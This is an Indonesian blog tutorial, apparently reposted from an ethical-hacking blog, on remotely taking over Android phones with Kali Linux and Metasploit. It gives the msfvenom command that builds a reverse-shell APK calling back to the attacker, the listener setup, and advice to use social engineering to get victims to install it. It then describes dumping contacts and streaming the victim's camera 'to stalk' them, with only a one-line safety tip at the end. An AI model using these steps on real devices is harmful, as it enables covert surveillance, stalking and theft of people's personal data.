Hack ponsel Android dari jarak jauh

Kita akan menggunakan msfvenom untuk membuat payload dan menyimpannya sebagai file apk. Setelah menghasilkan payload, kita perlu menyiapkan listener ke framework Metasploit. Setelah target mengunduh dan menginstal apk jahat, penyerang dapat dengan mudah mendapatkan kembali sesi meterpreter di Metasploit. Penyerang perlu melakukan beberapa rekayasa sosial untuk menginstal apk di perangkat seluler korban.

Tutorial langkah demi langkah

Menghasilkan Payload dengan msfvenom

Pertama, jalankan Kali Linux sehingga kita dapat menghasilkan file apk sebagai aplikasi berbahaya. Kita perlu memeriksa IP publik kita yang ternyata ‘192.168.0.112’. Kamu juga dapat meretas perangkat Android melalui Internet dengan menggunakan IP Publik/Eksternal kamu di LHOST dan dengan port forwarding.

kali

Setelah mendapatkan IP host publik Anda, gunakan alat msfvenom yang akan menghasilkan payload untuk menembus perangkat Android. Ketik perintah:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R > ehacking.apk

Dimana:

  • -p menunjukkan jenis payload.
  • android/meterpreter/reverse_tcp menentukan shell meterpreter terbalik akan datang dari perangkat Android target.
  • LHOST adalah IP Publik Kamu.
  • LPORT diatur sebagai listening port.
  • R> /var/www/html akan memberikan output langsung di server Apache.
  • apk adalah nama akhir dari hasil akhir.

Ini akan memakan waktu untuk menghasilkan file apk hampir sepuluh ribu byte.

kali-linix


Meluncurkan Serangan

kali-linux

Semua tampaknya sudah siap, sekarang jalankan msfconsole. Gunakan exploit multi/handler, atur payload sama seperti yang dihasilkan sebelumnya, atur nilai LHOST dan <p>LPORT</p> sama seperti yang digunakan dalam payload dan terakhir ketik exploit untuk meluncurkan serangan. kali-linux

Dalam skenario kehidupan nyata, beberapa teknik rekayasa sosial dapat digunakan untuk membiarkan target mengunduh file apk berbahaya. Untuk demonstrasi kita hanya tinggal mengakses mesin penyerang untuk mengunduh file di perangkat Android. kali-linux

Setelah berhasil mengunduhnya, pilih aplikasi yang akan diinstal.

Sejauh ini, opsi penginstallan sering terlihat ketika kita mencoba menginstal beberapa aplikasi pihak ketiga dan biasanya pengguna tidak akan ragu untuk mengizinkan instalasi dari sumber yang tidak dikenal. kali-linux

Setelah pengguna menginstal aplikasi dan menjalankannya, sesi meterepreter akan segera dibuka di sisi penyerang. kali-linux


Post Exploitation

Ketik “background” dan kemudian “sessions” untuk membuat daftar semua sesi dari mana Anda dapat melihat semua IP yang terhubung ke mesin. kali-linux

Kamu dapat berinteraksi dengan sesi apa pun dengan mengetik sessions -i [session ID] Setelah memasuki sesi, ketik “help” untuk membuat daftar semua perintah yang dapat kita ajukan di sesi ini.

Kamu dapat melihat beberapa perintah sistem file yang berguna saat Anda mencoba mencari beberapa informasi atau data sensitif. Dengan menggunakan ini, Kamu dapat dengan mudah mengunduh atau mengunggah file atau informasi apa pun kali-linux

Kamu juga akan menemukan beberapa perintah jaringan termasuk portfwd dan route kali-linux

Beberapa perintah sistem yang kuat untuk mendapatkan ID pengguna, mendapatkan shell atau mendapatkan informasi sistem yang lengkap.

Ketik “app_list” dan itu akan menampilkan semua aplikasi yang diinstal pada perangkat. kali-linux

Kita juga memiliki kekuatan untuk mencopot pemasangan aplikasi apa pun dari perangkat Android. kali-linux

Mengekstrak Kontak dari Perangkat Android

Sekarang kita ekstrak beberapa kontak dari perangkat target dengan mengetik “dump” dan tab ganda kali-linux

Ini akan menampilkan semua opsi untuk mengekstrak dari perangkat. Ketik “dump_contacts” dan enter kali-linux

Ini akan mengekstrak semua kontak dari perangkat Android dan akan menyimpannya di direktori lokal kita. Untuk melihat file ini ketik “ls” dan “cat [file_name]” kali-linux

Ini akan menunjukkan konten file kontak yang sebelumnya diunduh dari perangkat target. Informasi ini sangat sensitif dan dapat dimanfaatkan oleh peretas.

Mengendalikan Kamera Android

Dengan mengetik perintah “webcam_stream” kamu bisa menyusup dan mengamati melalui kamera android si korban, dan menguntitnya. kali-linux

Waspada… Android Terbaru pun Masih Lancar Terkena Serangan.

Handphone xiaomi MI10 dengan OS Android 10 Masih Lancar terkena serangan, Untuk kamu yang masih sering klik website tidak jelas yang masuk ke sms atau via whatsapp sebaiknya berhati-hati dari sanalah aplikasi ini terinstall diam-diam di android kamu. kali-linux

kali-linux

Ada masih banyak lagi perintah yang tersedia di meterpreter. Lebih lanjut coba jelajahi dan pelajari apa yang bisa kita lakukan dengan perangkat Android. Ini menyimpulkan bahwa kita telah berhasil menembus perangkat Android menggunakan Kali Linux dan Metasploit-Framework.

Tip sehat untuk mengamankan perangkat Android kamu adalah dengan tidak menginstal aplikasi apa pun dari sumber yang tidak dikenal, bahkan jika Anda benar-benar ingin menginstalnya, cobalah untuk membaca dan memeriksa kode sumbernya untuk mengetahui apakah file ini berbahaya atau tidak.

Artikel ini awalnya diterbitkan di blog ehacking.